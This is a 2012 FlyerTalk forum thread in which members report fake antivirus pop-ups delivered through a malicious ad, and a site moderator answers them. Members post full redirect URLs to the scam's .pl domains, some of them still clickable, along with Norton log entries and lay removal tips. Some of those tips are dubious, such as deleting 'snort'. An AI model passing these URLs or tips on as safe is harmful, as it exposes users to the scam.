Technical Support and Feedback - FALSE Virus alert [there is NO malware on your computer]

For those just coming to this thread for the first time, I have taken the liberty of pre-pending IBobi's answer from downstream here. cblaisd, Senior Moderator:

Hi everyone,

Once again, there is *no* malware on FlyerTalk.

We are working to determine which advertisement is causing this messaging to occur.

This kind of advertising is *not* approved by FT, and will immediately be blocked when it is located. Meanwhile, be assured that despite the message it shows you, you do not have a virus (from this) and FT is not infected. This is an advertisement that appears to be exploiting a hole in *Internet Explorer* to show a *false* virus alert.

One way to avoid it is to switch browsers to Chrome or Firefox.

I'll update as soon as I have new information; thank you for your continued patience while we work to block this ad.

Paul

Twice in the last two days while using FT i have had a pop up appear. It is designed to make it look like MS security essentials notice.

http://i5.photobucket.com/albums/y193/Braybuddy/MS.jpg

While I didn't get the specific virus alert that Polar Man mentions, I also noticed unusual virus alert messages while accessing FT the last couple of days, both on my home and work computers.

I, too, have gotten these alerts the past two days. Norton says

Category: Intrusion Prevention
7/20/2012 9:34 AM,High,An intrusion attempt by 173.254.192.44 was blocked.,Blocked,No Action Required,Fake App Attack: Fake AV Website

I got them on FT website (only) for 2-3 days, with wording:

Message from webpage

Viruses were found on your computer. You need to clean your computer to prevent the system crash. [OK]


When I tried to close the browser, I couldn't. Had to shut the computer down and restart.

I am also getting the MSE look-alike virus warning, but only with IE, not chrome.

Thank you all, we're looking into this, but FT appears to be clean. No virus found at all.

If someone can post a screen shot, we'll look into whether this is ad-related, or some other possibility?

Thank you!

Paul

I'll remember to grab a screenshot - but I've gotten this virus warning today on separate computers - it just seems to happen randomly but always on the flyertalk site.

I got the pop up yesterday and this morning. I will try to grab a screenshot if I get it again. I wonder if it really came from a banner?

+1 to Polar Man's experience.

I got a different pop-up than Polar Man got. If I get it again, I will post a screen shot.

I also only got this once yesterday and once today, despite numerous visits to FT. Have just assumed it was ad based. Did you check out the IP I posted earlier?

+1 to Polar Man

I got the same message as Skepticallie yesterday. Had to into my task manager to shut it down.

Just got the same.
Have emailed you, IBobi. - I have a screenshot I can send you.

Was going to http://www.flyertalk.com/forum/usercp.php?, but the address bar changed, pop-up appeared and Norton antivirus blocked a Fake App attack...

Closed it all, and worked fine this time.

here is the screen shot.

http://i71.photobucket.com/albums/i136/polar_man/virus.jpg

If you click on the x to close the popup then the " microsoft" warning pops up on a blank screen.

I also received it, I looked at the address bar at the top and this is where it is coming from..but only when I come to flyertalk

http://guarantorqueerprocessinspection.pl/2n11mqvrs5/ss/78dee9e271084cb2/pr2/196/

here is the screen shot.

http://i71.photobucket.com/albums/i136/polar_man/virus.jpg

If you click on the x to close the popup then the " microsoft" warning pops up on a blank screen.

I've got the same thing in the last couple of days on different computers.

This last time, a few minutes ago, the address bar changed to:

[deleted, per ff post]

A Google search produced nothing for that entire string, though there is evidently an "onlinecleancustodian.pl" but with other numbers in the last part of the string, and even then only one hit on Google.

This last time, a few minutes ago, the address bar changed to:

http://onlinecleancustodian.pl/550r11/ss/78dee9e271084cb2/pr2/196/

A Google search produced nothing for that entire string, though there is evidently an "onlinecleancustodian.pl" but with other numbers in the last part of the string, and even then only one hit on Google.

Just got another hit. Pop-up looked the same as the one Polar Man posted earlier today.

Norton reported

Category: Intrusion Prevention
An intrusion attempt by delivereravshield.pl was blocked.,Blocked,No Action Required,Fake App Attack: Fake AV Website 20,No Action Required,No Action Required,"delivereravshield.pl (96.44.155.85, 80)”

SkeptiCallie, clicking on the link you posted gets you another hit from the fake virus website. Maybe you could remove the hyperlink in the future? Thanks.

Just got another hit. Pop-up looked the same as the one Polar Man posted earlier today.

Norton reported

Category: Intrusion Prevention
An intrusion attempt by delivereravshield.pl was blocked.,Blocked,No Action Required,Fake App Attack: Fake AV Website 20,No Action Required,No Action Required,"delivereravshield.pl (96.44.155.85, 80)”

SkeptiCallie, clicking on the link you posted gets you another hit from the fake virus website. Maybe you could remove the hyperlink in the future? Thanks.

Thanks, glad to do so. I hadn't noticed that that was a hyperlink, just thought I was giving the address for IDing it. If mods need the link again, just PM me and I'll supply it to you. (Michelander, just to be thorough, could you also delete it in your quote of my post, and TIA.)

I got the same message earlier today as well as yesterday. But it didn't come as a small message box - rather it took over the entire FT page. When I x out, the whole browser window closes and I have to re-open the browser.

It certainly is annoying.

I received the same message about 2 hours ago. I closed it and ran SuperAntiSpyware and it came up clean.

I had similar notice when I have clicked on FT lately. It sets off my Norton saying they blocked an intrusion by "dangerdefenderdata.pl" at the IP address of 96.44.155.85, 80. I see that is the same IP address as previously posted but a different name.

I tried googling dangerdefenderdata.pl but doesn't bring up anything. I was able to trace the IP address to someplace in California.

Same experience as Vulcan. There's no virus of any kind on my machine, but they are somehow taking over and redirecting traffic from the FT site. Redirects the entire page away to a pseudo-virus message, wanting you to clean your computer (and no doubt buy their bogus anti-virus product).

I've been seeing the same problem for several days, only when I visit FT.

I don't get it in Safari or Chrome.

I've been seeing the same problem for several days, only when I visit FT.

Me too, only on Flyertalk. Can browse for hours, the minute I come here it sticks on the virus warning. Only on PC, I'm using my iPad now with no problem.

Just happened again. Whatever the issue is, it hasn't been fixed.

I got the same message earlier today as well as yesterday. But it didn't come as a small message box - rather it took over the entire FT page. When I x out, the whole browser window closes and I have to re-open the browser.

It certainly is annoying.

I have now had this exact same experience on three separate computers in three separate locations.

XP - IE
Vista - IE
W7 - IE

Each of the computers is clean of virus problems. In each instance, the web page is redirected.

This would appear to be an IBB issue.

Same here. Once a day, last time about a minute ago.

Same here. Once a day, last time about a minute ago.

Me too and that's now 3 or 4 times on different computers at home & work.

I've encountered it as well.

http://i1053.photobucket.com/albums/s463/g-didi/FTVirus.jpg

Second time I have got this warning when opening my bookmark to Flyertalk Forums.

(Hopefully the pic posts.... I really have no clue)

It has happened again, just now. This time the address was changed to (partial listing, to avoid the hyperlink), "http://" followed by the words

utilitywarderdefender.pl \

followed by numbers.

Interesting thing, however, about the numbers in the string. From "/ss/" on--i.e., "/ss/78dee9e271084" (etc.), the numbers are identical as to what they were before.

I.e., what changes now in the address bar are, first, the words, "utilitywarderdefender," and secondly, the numbers following those words, up to the "/ss/--etc," at which point the numbers are the same as in the earlier hyperlink.

[deleted]

Twice in the last two days while using FT i have had a pop up appear. It is designed to make it look like MS security essentials notice.

http://i5.photobucket.com/albums/y193/Braybuddy/MS.jpg

Yes I keep getting "Norton has blocked an attack" - seems to have a PL domain - Poland?

So is flyertalk going to do something about this? I'm pretty sure its a rogue banner ad script. They need to alert whoever provides their banner ads that there is a bogus ad causing malware popups. Looks like doubleclick.net to me.

Would that cause the screen to freeze? I have to turn my laptop off whenever the pop-up appears, as nothing works any longer, can't even exit the screen with Ctrl Alt Del.

I'm getting the same thing on two computers. Both running IE on Win7 and as with others only when I visit FT.

I'm at least able to run task manager and then close out the IE windows which are causing the problems.

Running Windows 7

Just happened to me as well.

I have encountered too. It seems to me that this happens if my mouse is in the wrong place at the wrong time. It seems the mouse triggers some action which brings up the site. This always happens when the page is loading.

No log entries in Norton.

What is one supposed to do and not do when this happens? I guess clicking that OK on the dialogue box would be a bad idea, right?

Thanks.

I have encountered too. It seems to me that this happens if my mouse is in the wrong place at the wrong time. It seems the mouse triggers some action which brings up the site. This always happens when the page is loading.

No log entries in Norton.

What is one supposed to do and not do when this happens? I guess clicking that OK on the dialogue box would be a bad idea, right?

Thanks.

Definitely never click on the OK. Best thing to do is to go into task manager and shut down the window.

I am now getting jetcomp.exe Application errors. Running NAV full scan now but I almost thinkg Norton might not know anything about this...

Just happened again. Anyone know how to make this thing stop?

I have encountered too. It seems to me that this happens if my mouse is in the wrong place at the wrong time. It seems the mouse triggers some action which brings up the site. This always happens when the page is loading.

No log entries in Norton.

What is one supposed to do and not do when this happens? I guess clicking that OK on the dialogue box would be a bad idea, right?

Thanks.

I am now getting jetcomp.exe Application errors. Running NAV full scan now but I almost thinkg Norton might not know anything about this...

I think the best thing to do is to disconnect from the network before you click on anything. Then close the window before restarting the network (personnally, I also run a quick scan wth Norton before reconnecting). Clicking on OK while connected to the network will almost surely result in an attempt to install a virus or trojan on you computer.

I do get a log entry in Norton for every one of these and I get a pop-up alert saying it stopped an attack. Even posted a couple of partial log entires earlier in the thread. Every scan I have run for this problem has come back clean.

Thank you all for reporting this; we're looking into it and we'll update as soon as we have any information, though a thorough scan of FlyerTalk last week revealed no cause for alarm.

Paul

Hi all,

We are working to see where this "virus" message is coming from.

You can help us by capturing a FULL PAGE screenshot (to get the ads in the shot as well) and posting it here or emailing it to me at paul.obrien (at) internetbrands.com.

If someone can also right-click on the page and copy & paste the View Page Source information, that'd be helpful. Since this is an intermittent issue that is affecting only a small percentage of users, it's difficult for us to replicate & trace.

Thank you,

Paul

Several times ...IE with W7 picked up by Norton.

You've got mail.

This is a particularly nasty one.

Hi all,

We are working to see where this "virus" message is coming from.

You can help us by capturing a FULL PAGE screenshot (to get the ads in the shot as well) and posting it here or emailing it to me at paul.obrien (at) internetbrands.com.

If someone can also right-click on the page and copy & paste the View Page Source information, that'd be helpful. Since this is an intermittent issue that is affecting only a small percentage of users, it's difficult for us to replicate & trace.

Thank you,

Paul

[snip]

This is a particularly nasty one.

Could you explain? Is there a possibility that we might have virus infections that might be difficult to detect?

I Googled the words,

"You need to clean your computer to prevent the system crash"

and I got a number of hits. From one of those websites, I gathered that the first might attempt to install a Trojan called "Windows ProSecurity Scanner." I Googled that term also and found a lot of hits re how to remove it if infected.

That's just FYI, to illustrate that this matter has been around awhile before it ever hit FT. I'd be afraid of the websites that offer to remove the alleged Trojan as well as the alleged Trojan threat. But my point is that there is some information out there evidently.

Twice in the last two days while using FT i have had a pop up appear. It is designed to make it look like MS security essentials notice.

http://i5.photobucket.com/albums/y193/Braybuddy/MS.jpg

i have gotten it also, and last month as well. i thought i had gotten it off, but then when I signed onto flyertalk again. its definetly in this program. what a pain.

Is this popup coming up on any flyer talk thread? I normally only go onto American, One world or Marriott theads.

Is this popup coming up on any flyer talk thread? I normally only go onto American, One world or Marriott theads.

That's a thought. Maybe it can be tracked to a specific forum. Although, this thing only hits me when I first click on MyFlyerTalk, not when I go to a forum.

Still, of the list above the only one I subscribe to is Marriott.

Hi all,

We are working to see where this "virus" message is coming from.

You can help us by capturing a FULL PAGE screenshot (to get the ads in the shot as well) and posting it here or emailing it to me at paul.obrien (at) internetbrands.com.

If someone can also right-click on the page and copy & paste the View Page Source information, that'd be helpful. Since this is an intermittent issue that is affecting only a small percentage of users, it's difficult for us to replicate & trace.

Thank you,

Paul

Paul,

I would be willing to do this, but when I get hit the page goes blank and I just get the popup. Will grab the source the next time, but I suspect it will not be the FT source.

I do get a log entry in Norton for every one of these and I get a pop-up alert saying it stopped an attack. Even posted a couple of partial log entires earlier in the thread. Every scan I have run for this problem has come back clean.

Strange, my Norton never picked this up (and it is up-to-date). I did run a full scan last night and it came back clean. Still, I keep getting that JETCOMP error which I am pretty sure is related to this. I guess no banking from this computer for a while...

Been happening to me as well the last few days... same one as everyone else is seeing... usually happens first time I jump on the site whilst surfing..

Happened to me as well tonight. Only on Flyertalk.

Happened to me a few times as well since Sunday both on my home laptop and work PC which have different virus detection programs. And it's only when I access flyertalk. Sometimes it happens as soon as I go to flyertalk and today it happened after being on the site a while after I posted a message. The only way to get out of it is to open the task manager and shut IE down.

It doesn't happen on my IPAD though.

I got the virus alert twice yesterday and once again this morning. It is always from the same IP address but the website changes. This morning's website was "performancetestprevention.pl" It seems when I go from one website (like a news website) to FT. I use Windows IE 7. I am just glad I Norton to protect me.

So glad I found this thread as I am getting this to (in the UK) - only when using IE, and only when logged in to my account. Both home and work PCs, and bother have been scanned with different up to date software and reveal no viruses on my machine.

I get it (1) only when on IE, not Chrome; (2) whether signed in or not, makes no difference; and (3) when clicking on several FT forums, including this one and including OMNI, also the "Dining" forum in "Travel & Dining."

So for me, the two consistent factors are IE browser and FT website.

I get it:

Only on IE
Only when I'm clicking on the "Americas-USA" forum

When I click the Back Button, it asks me if I really want to go there without cleaning my computer, I tell it OK, and I surf like normal.

Seems to come up just once a day for me.

Might have fallen for it but for the bad grammer.

Suffered from the not able to connect with facebook issue and tried IE to see if it would help. Immediately got this issue - so second on not happening on chrome, only on IE.

Suffered from the not able to connect with facebook issue and tried IE to see if it would help. Immediately got this issue - so second on not happening on chrome, only on IE.

Still happening this week, still only on IE, not chrome.

Any chance of IBB getting this fixed?

I am not used to having FT be such a chancy destination.

I received it this morning again. I typed flyertalk.com & the home page came up/didn't have time to log in to my flyertalk before the virus screen came up.

I'm on IE.

Cheers.

Had the virus warning twice in the past week on IE when browsing the Alaska Airlines forum.

Ditto - IE browser and FT website. Houston we have a problem.

Kill IE from the Task Manager when the message appears.

Had this problem again today again using flyertalk.com/forums (IE)stored in my bookmarks. I have not had the virus alert going forum to forum.

I dont even see the Flyertalk banner load and I get the virus alert. The screen comes up white with the alert - no ads were clicked. It looks exactly like the pic I posted earlier in the thread. (I dont know how to do a full screenshot. Sorry.)

Today the address in the bar is some place . pl again. I tried right clicking and nothing happens so could no provide you the page source info requested.

Task Manager used to close the page. Task manager actually shows Flyertalk running and the IE page with virus alert running although I dont actually have a visible page of Flyertalk.

Ran malware and virus protection software. Always comes up clean.

Must say this is getting annoying. Makes me have second thoughts when I think about coming here - dont want to risk a virus/trojan etc.

I've had it too - on travelbuzz and BAEC. I'm another IE user

Me too. First at the weekend (can't remember exactly what I clicked on, but I was logged in). Recognised it for what it was, ctrl+alt+escaped out of it. Ran full scan on computer - nothing.

All fine until 10 minutes ago - not logged in, it popped up when I clicked on a thread in the BA forum from the front page. I'm using IE and Vista. Came here to report it, and found this thread...

Often browse FT on iPhone, and have not had anything similar. Nothing similar on other sites.

Seems IE is much of the problem.

Just happened again when I went from the home page to the forums page. The culprit in my case appears to be: http://lowanalysisthreat.pl/o1y0bx4ov/al/78dee9e271084cb2/pr2/196/

I also have this problem.

I am extremely concerned. My anti-virus software kicks me off the entire site with big alert messages.

I only ever experience it on the Executive Club, although most of my time is spent there.

Has a corrupt moderator added viruses to the site, or is it some dodgy advertisement?

I am hoping an over protective anti-virus software is to blame, but I don't know what to do!!

Hopefully this gets fixed on a more timely basis than the powerpint.net warnings I had to endure for months on end.

have run a debug on the page, script has a bug at line 128 the link the virus is going to is shown on this site

http://urlquery.net/report.php?id=101136

everyone search your comp for snort then delete

this is part of line 128 FB.provide('Edgar',{injectStubs:function(){functio n

Object doesn't support this property or method FeatureLoader.js.php, line 128 character 188

anyone who gets this virus alert all you have to do is use your back button to gat away from the false page

Here ar some screen shots. No adds are visible. The page redirects to the virus alert before FlyerTalk banner or adds appear.
http://i524.photobucket.com/albums/cc321/dioxide45/1.jpg

When you click the X to close, the next screen appears.
http://i524.photobucket.com/albums/cc321/dioxide45/2.jpg

When you click the red X to close, the first screen pops up again.

If you do a right click / close on Internet Explorer on the task bar, you get this message.
http://i524.photobucket.com/albums/cc321/dioxide45/3.jpg

Trying to kill it through Task manager causes the same popup, but it does eventually close.

FWIW, I've had the exact same thing twice in the last couple of days.

Neil

FWIW, I've had the exact same thing twice in the last couple of days.

Neil

I've had this happen several times as well. Takes me to:

http://debuggertestingprevention.pl/90iz6xzq6/al/78dee9e271084cb2/pr2/196/

still hppening

Just happened again when I went from the home page to the forums page. The culprit in my case appears to be: http://lowanalysisthreat.pl/o1y0bx4ov/al/78dee9e271084cb2/pr2/196/

This was me too last night!

I've mostly switched to Chrome for FT as a result. I went back to IE a few minutes ago to test using "back" per earlier poster. For me it didn't work. In using IE, I got the virus screen about two seconds after navigating in FT, so I tried the "backspace" on the keyboard. That didn't close out the virus screen. So I tried the left arrow to navigate out, per post 78 (which I might not have understood), but that didn't work either. Tried the left arrow in combination with other keys, and that also didn't work. What did work for me was right-clicking on the bottom bar on the screen, then clicking on "Task Manager" (which I have now become aware of, thanks to this thread ;) ) and ending the task. That worked. But I still wondered about residual effects, so I just shut the computer down and started over with Chrome.

What I am wondering about is whether the virus screen will lead to any viruses or other malware being installed on our computers. When the technical people at IB find an answer to what is causing the screen appearing, I hope they will let us know what we should be aware of in terms of that possibility. Not everyone uses virus protection over and above that which is already provided by their OS, as for some people,a lot of it doesn't work well with their computers, and for those who do, not every virus protection program screens against all malware. So it would be good to know which virus protection program is effective against this thing, if indeed it is successful in installing itself on some computers.

Maybe I am concerned too soon. Hope so.

This is the link I got just now:

http://testscanningtasks.pl/690zm52/al/78dee9e271084cb2/pr2/196/

Several times over the last few days I have accessed this [BA Executive Club] forum and have then been automatically redirected to a different page, for instance this one

http://testscanningtasks.pl/690zm52/al/78dee9e271084cb2/pr2/196/ (do NOT click on any dialog on the page if you view this, close your browser window).

This page, or similar pages have indicated that Microsoft Security Essentials or McAfee security "has scanned my machine and found that it is infected".

Now, I work for McAfee and know that no such thing has happened.

This is what is known as a malvertisement and or "fake AV" and it is a scam, as my machine is NOT infected. The way the scam works is it says your machine is infected and if you pay a fee it will clean your machine. After you pay, hey presto! you're told your machine is clean, when it likely was all along. It does not clean anything.

You may want to look into who is generating these advertisements on your web site before it gives you a bad name through association.

Are you sure your DNS isn't polluted? Never seen this.

I saw this today too

I have been encountering exactly the same situation for several days.

Yep, I am getting this regularly as well.

I think one of the ad's may be 'infected'.

I'm moving this over to the Technical Issues forum.

Prospero
Moderator: BAEC forum

See also discussion in Technical Issues: http://www.flyertalk.com/forum/technical-issues/1368367-false-virus-alert.html

I am getting this to.

Looks like one of your ad's is a bit dodgy. I've seen similar happen on other forums in the past as well.

You should really look at shutting down the offending provider as some less tech savvy people might install the rubbish that is offered.

Are you sure your DNS isn't polluted? Never seen this.

I don't see this from other sites. I do not believe my DNS is polluted.

I suspect what is happening is that genuine adverts are shown for the majority of the time but occasionally (randomly) a "bad" one is shown, making it harder to track down who is serving these up.

OK, so it has now been a week since this first started happening, and five days or so since it was reported to IBB.

Today, on the fifth or sixth computer (I am losing count) it happened again. Since most elite FF lounges use Windows and IE, this means that most anyone who is in a lounge and using the box provided by the lounge will likely encounter the virus.

Has there been any progress on fixing the FT site security and/or ridding FT of the culprit ads?

Still happening to me. I would suggest that a statement about this problem be made on the main Flyertalk page and perhaps each of the forums. It took me awhile to find this forum and I would think all the members would need to know about this. I would also politely ask the administrators to let us know what is going on.

Merged a thread with the existing one on this issue to avoid messaging duplication.

We're working to determine which ad is causing this messaging to occur. This kind of advertising is *not* approved by FT, and will immediately be blocked when it is located. Meanwhile, be assured that despite the message it shows you, you do not have a virus (from this) and FT is not infected. This is an advertisement that appears to be exploiting a hole in Internet Explorer to show a false virus alert.

One way to avoid it is to switch browsers to Chrome or Firefox.

I'll update as soon as I have new information; thank you for hanging in there with us while we resolve this.

Paul

I've had this too, on a number of different computers, at different locations.

If it's any help (and sorry if someone has already posted this), the internet address that it points to when I get the virus message is:

http://performancecaredetector.pl followed by a load of numbers.

I agree with the earlier poster who suggested it should be highlighted on each of the forums.

I've been seeing the same problem, only when I visit FT.

I've mostly switched to Chrome for FT as a result. I went back to IE a few minutes ago to test using "back" per earlier poster. For me it didn't work. In using IE, I got the virus screen about two seconds after navigating in FT, so I tried the "backspace" on the keyboard. That didn't close out the virus screen. So I tried the left arrow to navigate out, per post 78 (which I might not have understood), but that didn't work either. Tried the left arrow in combination with other keys, and that also didn't work. What did work for me was right-clicking on the bottom bar on the screen, then clicking on "Task Manager" (which I have now become aware of, thanks to this thread ;) ) and ending the task. That worked. But I still wondered about residual effects, so I just shut the computer down and started over with Chrome.

What I am wondering about is whether the virus screen will lead to any viruses or other malware being installed on our computers. When the technical people at IB find an answer to what is causing the screen appearing, I hope they will let us know what we should be aware of in terms of that possibility. Not everyone uses virus protection over and above that which is already provided by their OS, as for some people,a lot of it doesn't work well with their computers, and for those who do, not every virus protection program screens against all malware. So it would be good to know which virus protection program is effective against this thing, if indeed it is successful in installing itself on some computers.

Maybe I am concerned too soon. Hope so.

If you mean you hit the backspace and left arrow keys on your keyboard, that is not what knwl9 meant. S/he meant to click on the browser's back arrow (left pointing arrow in the upper left corner of the browser.)

Some of these links are just trying to sell you bogus AV software, some are trying to install a virus or trojan. It does appear to be a well known exploit, though, and as long as you have reputable, up-to-date AV software and you don't click on any of the buttons on the pop-up, you should be fine. If you are really concerned and use Norton, you can always run Power Eraser from the Norton site. Other vendors may have similar products. Norton has told me it blocked access every time I have gotten the pop-up.

If you mean you hit the backspace and left arrow keys on your keyboard, that is not what knwl9 meant. S/he meant to click on the browser's back arrow (left pointing arrow in the upper left corner of the browser.)



I had already done that on several occasions, and it never worked. So I had assumed that knwl9 had meant something different, but those methods didn't work either. Thanks, however. I have just switched to using Chrome and am waiting to see if I need to check for a virus, but assume that this is just a rogue ad.

Been getting the same fake warning on 3 different computers the last few days. Only happens when I am on Flyertalk

I had run the real MSE earlier today and found Rogue:JS/FakePAV; I thought this might be the problem. But I removed it and the FT problem came up again later in the day. I ran MSE again and there were no alerts, so according to MSE, there's no problem with the computer.

You really need to get a handle on this. I'm starting to avoid FT because it's becoming a hassle to always fire up Task Manager to nuke the browser, just to make that idiotic (whoever wrote it can't spell) message go away.

You really need to get a handle on this. I'm starting to avoid FT because it's becoming a hassle to always fire up Task Manager to nuke the browser, just to make that idiotic (whoever wrote it can't spell) message go away.

It is a bit crap this. I had another forum with this problem and the site admins shutdown the adfeeds one at at time to identify who was supplying the rogue advert.

Ideally, if the FT admins cannot work it out by the information being supplied then they need to leave each feed off for a couple of days and ask if the problem has stopped. Once the offending feed has been located then it's a case of working with the ad provider to locate the exact ad.

I'm going to configure an ad blocker to block all adverts from FT now to see if that makes the problem go away for me.

PITA - yes, it is a PITA

For anyone on ie9 if you install the tracking protection list from here:http://www.privacychoice.org/trackerblock/ie9

Then it will block most ads. Not sure if you are allowed to block ads here or not but I didn't ask for them to redirect me to dodgy websites either.

I'd really appreciate an update on how this is being resolved.

I posted the Norton tracking information to the email address previously in the thread but heard nothing more.

The concerns are obvious. Not only will there be FT'ers without any virus protection being infected but also that other platforms may be targetted.

Can we have an update URGENTLY please?

This has happened to be just now for the second time so I'm afraid I can't take the risk anymore so will not be using flyertalk again! Perhaps once the problem is found and corrected the administrators could email everyone and let them know (if that is possible?)

Thanks to everyone who has helped with my queries and happy flying to everyone!!

Jay

Just read the previous post from Paul - will try the forum using chrome and see if it stops! Thanks Paul, I really enjoy reading this forum - have only just recently found it too - and would like to continue using it.

Just happened again, but this time with a twist. No virus message - just a totally blank page. URL is http://vulnerabilitytestingwarder.pl/ms5p7s/al/78dee9e271084cb2/pr2/196/

I've also gotten this twice. Both times, the URL was antivirustestcenter.pl. Forced to use IE on my work laptop. Just shut down IE both times to get rid of it.

Hit this again this morning.

Neil

I'm still getting this on two computers. It only happens once a day on each computer. It seems to happen about every 24 hours as well.

I did NOT get it today on IE. First time (just logged in a few minutes ago).

I clicked on FlyerTalk on my home computer the other day. A warning pops up in the middle saying that my computer has a virus (but not from my anti-virus system). FlyerTalk is the only site where this happens. What gives?

Moving this thread to Technical Issues where it can be viewed and responded to by Internet Brands admins.

________________

Cholula
OMNI CO-MODERATOR

Are you up to something now. I came to FT and the page started to load and then i was taken to ?

http://0.0.0.196/

this left me with a blank screen

:mad:Very disappointed in flyertalk....the malware took over my computer last week and it blocked all internet access...it wanted 80 dollars with a visa or mastercard....luckily I had 2 users on the computer and only I was blocked so i downloaded on the other user Malwarebytes and it took 2 hours to clean my computer.....it had loaded the malware Live Platinum Security....now when I go back to flyertalk the pop up still appears ....your competer is infected...whether you click yes or no...it will relaunch the malware....all I can do is unplug the internet connection and reboot the computer.....can anyone explain the association of this malware to flyertalk....??????

Hi everyone,

Once again, there is *no* malware on FlyerTalk.

We are working to determine which advertisement is causing this messaging to occur.

This kind of advertising is *not* approved by FT, and will immediately be blocked when it is located. Meanwhile, be assured that despite the message it shows you, you do not have a virus (from this) and FT is not infected. This is an advertisement that appears to be exploiting a hole in *Internet Explorer* to show a *false* virus alert.

One way to avoid it is to switch browsers to Chrome or Firefox.

I'll update as soon as I have new information; thank you for your continued patience while we work to block this ad.

Paul

I'm still getting this on two computers. It only happens once a day on each computer. It seems to happen about every 24 hours as well.

Yeah, should have mentioned this before, but I get this exactly once a day. No more, no less. Don't know if that provides any hints to the source at all. Also, yesterday and today I ended up with a "IE can not display this page" rather than the pop-up.

One way to avoid it is to switch browsers to Chrome or Firefox.

If IB disabled the ads until they finally figure this out, then you'd stopping freaking out the poor folk who are getting these alerts.

I am also getting the MSE look-alike virus warning, but only with IE, not chrome.I had a popup like that with chrome. Also flyertalk seems to freeze and hang just in last week or so which it never did before. I have all ads blocked normally.

:mad:Very disappointed in flyertalk....the malware took over my computer last week and it blocked all internet access...it wanted 80 dollars with a visa or mastercard....luckily I had 2 users on the computer and only I was blocked so i downloaded on the other user Malwarebytes and it took 2 hours to clean my computer.....it had loaded the malware Live Platinum Security....now when I go back to flyertalk the pop up still appears ....your competer is infected...whether you click yes or no...it will relaunch the malware....all I can do is unplug the internet connection and reboot the computer.....can anyone explain the association of this malware to flyertalk....??????

Don't click on any buttons, you can click the X in the upper corner, but that doesn't help either. You need to open task manager and end the Internet Explorer task/application.

This is not a flyertalk problem. I have been getting these fake virus warnings for about a week now. I have had them on the Game Show network. gsn.com, and I have had them on facebook. They have to be coming from advertisements. I just did a new install of Windows XP and all the paches with a new copy of AVG and I still get them. I'm going to have to start browsing with my linux box. :D
I like to play jacks or better poker on gsn.com and the only thing that changes when I'm playing is the advertisements
on the side bar. I can be playing for 30 min on the same page and get this when the advertisements change.

It is not Flyertalk.
Twobyte

It IS Flyertalk ads. I (and dozens of others who have reported here) have not gotten it from any other site. It is some ad they are accepting on FT, which is running a script which takes over the entire page.

Merged a thread with the existing one on this issue to avoid messaging duplication.

We're working to determine which ad is causing this messaging to occur. This kind of advertising is *not* approved by FT, and will immediately be blocked when it is located. Meanwhile, be assured that despite the message it shows you, you do not have a virus (from this) and FT is not infected. This is an advertisement that appears to be exploiting a hole in Internet Explorer to show a false virus alert.

One way to avoid it is to switch browsers to Chrome or Firefox.

I'll update as soon as I have new information; thank you for hanging in there with us while we resolve this.

Paul

I just got rid of IE and got Google Chrome. I don't know why I didn't get that browser before now. All I know is I have been surfing different sites and no popups. I assume that will also take care of the issue of the false virus noticed on FT. I will keep you posted.

By the way, IE sucks and Google Chrome rocks (so far).

It IS Flyertalk ads. I (and dozens of others who have reported here) have not gotten it from any other site. It is some ad they are accepting on FT, which is running a script which takes over the entire page.

+1 - It is ABSOLUTELY flyertalk. I work in the industry, and I do not have this problem anywhere else. It is very, very concerning and shows a severe lack of security on the flyertalk site.

Don't click on any buttons, you can click the X in the upper corner, but that doesn't help either. You need to open task manager and end the Internet Explorer task/application.

Actually Ctrl-W closes the window(s) with no problem. But no, don't push any buttons!

I am extremely annoyed the way FlyerTalk is handling this problem. This has been going on for almost a week, and I have seen no mention of it except in this forum. No warnings or explanations on the home page or any of the other forum pages. I am assuming this is causing great concern to many members who don't come to this thread. A recommendation to switch browsers is not enough. I sincerely hope that the administrators come up with a solution or at least a warning to other members.

I am extremely annoyed the way FlyerTalk is handling this problem. This has been going on for almost a week, and I have seen no mention of it except in this forum. No warnings or explanations on the home page or any of the other forum pages. I am assuming this is causing great concern to many members who don't come to this thread. A recommendation to switch browsers is not enough. I sincerely hope that the administrators come up with a solution or at least a warning to other members.Agreed. If they can post a sticky in all forums when they want us to vote on some meaningless poll somewhere, they can certainly do it for something like this.

Also, there have been multiple suggestions that they shut down individual ad providers for a day or two in an effort to identify the source. That seems like a reasonable option.

Or they can do a better job of collecting data from the people that are reporting it so that they can work to identify the ad faster. If nothing else, that would make it look more like they were actively investigating :p

For those who get the Norton warning, does it happen when the false virum message pops up on IE? Or, Norton comes up when you actually click a button inside the message's dialogue box?

Thanks.

One way to avoid it is to switch browsers to Chrome or Firefox.

Paul

Could you not turn off adverts for all users instead? Then for some test users leave ad's on and disable the feeds one at a time until you work out the offending provider.

Once it's identified turn adverts back on.

I have been forced into manually blocking all adverts from your site currently which I do not like doing as I realise you get paid based on users taking products via the links and I like to try and do my bit to help.

I'm amazed at the lack of updates to this serious problem here TBH.

For anyone on ie9 if you install the tracking protection list from here:http://www.privacychoice.org/trackerblock/ie9

Then it will block most ads. Not sure if you are allowed to block ads here or not but I didn't ask for them to redirect me to dodgy websites either.

For anyone new to this thread using IE9 then you can use the above link to block the ad's, not just for this site but for the majority of sites. Once the problem is rectified you can turn it off

Hi everyone,

Once again, there is *no* malware on FlyerTalk.

We are working to determine which advertisement is causing this messaging to occur.

This kind of advertising is *not* approved by FT, and will immediately be blocked when it is located. Meanwhile, be assured that despite the message it shows you, you do not have a virus (from this) and FT is not infected. This is an advertisement that appears to be exploiting a hole in *Internet Explorer* to show a *false* virus alert.

One way to avoid it is to switch browsers to Chrome or Firefox.

I'll update as soon as I have new information; thank you for your continued patience while we work to block this ad.

Paul

All due respect Paul, there clearly IS malware on FlyerTalk, or at very least, something behaving like malware to scare users into action.

Now, you may not have approved it, you may not appreciate it, you may not want it here, but it's here, and it's coming in from an ad on your site.

Therefore, it IS "your problem."

I would hope you and your team would address this issue head-on and notify your community about this - which just impacted me a few minutes ago! - by prominently displaying a warning about this issue until you are 100% certain it has been resolved and the offending ad removed from circulation by the vendor supplying your ads.

Otherwise, you're going to rapidly lose credibility with your users.

Just my $0.02 worth, of course...

Hi

Just my two pennies worth here...

But I too have been getting redirects to several Polish websites (http://urlquery.net/report.php?id=105702) with fake Microsoft Security Essentials alerts. This is happening only when I try to access FlyerTalk.com via the address bar autocomplete history or via a Google search.

At first I believed I was infected with some form of malware, but after extensive testing and experiencing the problem on two seperate computers, it is now clear that for some reason it is coming from FlyerTalk.com. I have asked some IT experts if they can figure on exactly why this is happening, so will post on here any information I get.

